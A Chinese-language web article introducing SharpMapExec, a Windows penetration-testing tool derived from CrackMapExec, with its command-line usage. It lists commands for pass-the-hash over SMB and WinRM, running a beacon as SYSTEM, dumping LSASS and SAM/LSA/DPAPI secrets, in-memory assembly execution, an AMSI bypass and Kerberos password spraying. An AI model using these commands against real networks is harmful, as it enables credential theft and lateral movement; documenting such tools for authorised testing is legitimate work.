溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

SharpMapExec是什么

發(fā)布時(shí)間:2021-12-28 10:06:15 來源:億速云 閱讀:190 作者:小新 欄目:網(wǎng)絡(luò)管理

這篇文章主要為大家展示了“SharpMapExec是什么”,內(nèi)容簡(jiǎn)而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“SharpMapExec是什么”這篇文章吧。

SharpMapExec

SharpMapExec是一款針對(duì)網(wǎng)絡(luò)滲透測(cè)試高級(jí)瑞士Knife,該工具基于CrackMapExec,可以將其理解為是CrackMapExec的優(yōu)化版本。該工具的目的是簡(jiǎn)化網(wǎng)絡(luò)滲透測(cè)試的任務(wù)操作,并提供一個(gè)多功能的滲透測(cè)試平臺(tái),該工具目前僅支持在Windows操作系統(tǒng)上運(yùn)行,這也符合內(nèi)部威脅模擬攻防的常見要求。

除了掃描訪問權(quán)限外,它還可用于識(shí)別存在安全的錯(cuò)誤配置以及過濾數(shù)據(jù)。數(shù)據(jù)過濾模塊的核心實(shí)現(xiàn)思想是在遠(yuǎn)程計(jì)算機(jī)上執(zhí)行最少的必要代碼,為了完成這個(gè)任務(wù),該工具將把所有的敏感數(shù)據(jù)下載到loot目錄并在本地解析它們。

廣大研究人員可以指定是否要使用Kerberos或NTLM身份驗(yàn)證,如果選擇了Kerberos,那么該工具將創(chuàng)建一個(gè)令牌,并使用Rubeus導(dǎo)入或請(qǐng)求憑證。如果指定了NTLM,相應(yīng)的工具將會(huì)創(chuàng)建一個(gè)線程并使用SharpKatz運(yùn)行SetThreadToken(如果指定了NTLM散列)。

工具使用

SharpMapExec.exe

  usage:

 

    --- Smb ---

        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET

        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

 

      Available Smb modules

          /m:shares

 

    --- WinRm ---

        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET

        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

 

      Available WinRm modules

          /m:exec /a:whoami                           (Invoke-Command)

          /m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)

          /m:comsvcs                                  (Dump Lsass Process)

          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)

          /m:assembly /p:Rubeus.exe /a:dump           (Execute Local C# Assembly in memory)

          /m:assembly /p:beacon.exe /system           (Execute Local C# Assembly as System in memory)

          /m:download /path:C:\file /destination:file (Download File from Host)

 

    --- Domain ---

        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC

        SharpMapExec.exe tgtdeleg

SMB

可以用于掃描管理員訪問或可訪問的SMB共享。

模塊:

/m:shares                                  (Scan enumerated shares for access)

WinRM

該模塊內(nèi)置了AMSI繞過、JEA語言中斷和JEA函數(shù)分析等功能,可用于代碼執(zhí)行、掃描PsRemote訪問、易受攻擊的JEA節(jié)點(diǎn)和數(shù)據(jù)過濾。

Domain

當(dāng)前支持域密碼噴射,以及為當(dāng)前用戶創(chuàng)建TGT,該TGT可與/ticket參數(shù)一起使用以獲取當(dāng)前上下文。

工具使用樣例

該工具支持在內(nèi)存中執(zhí)行大量的C#程序:

SharpMapExec是什么

Kerberos密碼噴射并掃描本地管理員訪問:

SharpMapExec是什么

該項(xiàng)目支持掃描JEA節(jié)點(diǎn),將分析非默認(rèn)命令的源代碼,并檢查節(jié)點(diǎn)是否未配置為no-language模式:

SharpMapExec是什么

使用一個(gè)NT哈希掃描本地管理員密碼復(fù)用:

SharpMapExec是什么

大批量轉(zhuǎn)儲(chǔ)Lsass進(jìn)程,并將其保存到loot文件夾:

SharpMapExec是什么

在某些使用Kerberos的場(chǎng)景下,可能會(huì)要求用戶同步DC時(shí)鐘并設(shè)置DNS

net time \\DC01.hackit.local /set

Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

以上是“SharpMapExec是什么”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI